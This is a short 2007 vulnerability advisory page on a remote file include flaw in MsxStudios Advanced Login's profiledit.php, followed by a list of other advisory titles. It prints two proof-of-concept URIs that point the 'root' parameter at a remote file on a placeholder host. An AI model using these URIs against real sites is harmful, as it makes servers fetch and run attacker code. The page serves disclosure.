exploits , vulnerabilities , articles , MsxStudios Advanced Login ProfileEdit.PHP Remote File Include Vulnerability

Title	MsxStudios Advanced Login ProfileEdit.PHP Remote File Include Vulnerability
Published	2007-03-29-12:00AM
Updated	2007-03-29-12:00AM
Class	Input Validation Error
CVE
Remote	Yes
Local	No
Credit	Zeni Susanto is credited with the discovery of this vulnerability.
Vulnerable	MsxStudios Advanced Login 0.76 MsxStudios Advanced Login 0.7
Not Vulnerable
Code	Attackers can use a browser to exploit this issue. The following proof-of-concept URIs are available: http://www.example.com/login/engine/db/profiledit.php?root==http://www.example2.com/colok.txt? http://www.example.com/login/engine/profiledit.php?root==http://www.example2.com/colok.txt?
TXT

Vulnerabilities - newest 10 RSS | More

• 2009-12-03 phpMyFAQ 2.5.4 and Prior Multiple Cross Site Scripting Vulnerabilities
• 2009-12-02 Drupal Taxonomy Timer Module SQL Injection Vulnerability
• 2009-12-02 Pligg Cross Site Scripting And Request Forgery Remote Vulnerabilities
• 2009-12-02 SafeNet SoftRemote Policy File Handling Remote Buffer Overflow Vulnerabilities
• 2009-12-02 Autodesk 3ds Max Application Callbacks Arbitrary Command Execution Vulnerability
• 2009-12-02 Autodesk Softimage Scene TOC File Remote Code Execution Vulnerability
• 2009-12-02 Autodesk Maya MEL Script Nodes Remote Command Execution Vulnerability
• 2009-12-02 Roxio Creator Image Parsing Integer Overflow Vulnerability
• 2009-12-02 Simple Machines Forum Multiple Security Vulnerabilities
• 2009-12-01 AWStats Multiple Unspecified Security Vulnerabilities

• Vulnerabilities
• Exploits
• News
• Articles

Copyright 2007, SecurityDot
Thu, 03 Dec 2009 19:29:02 +0000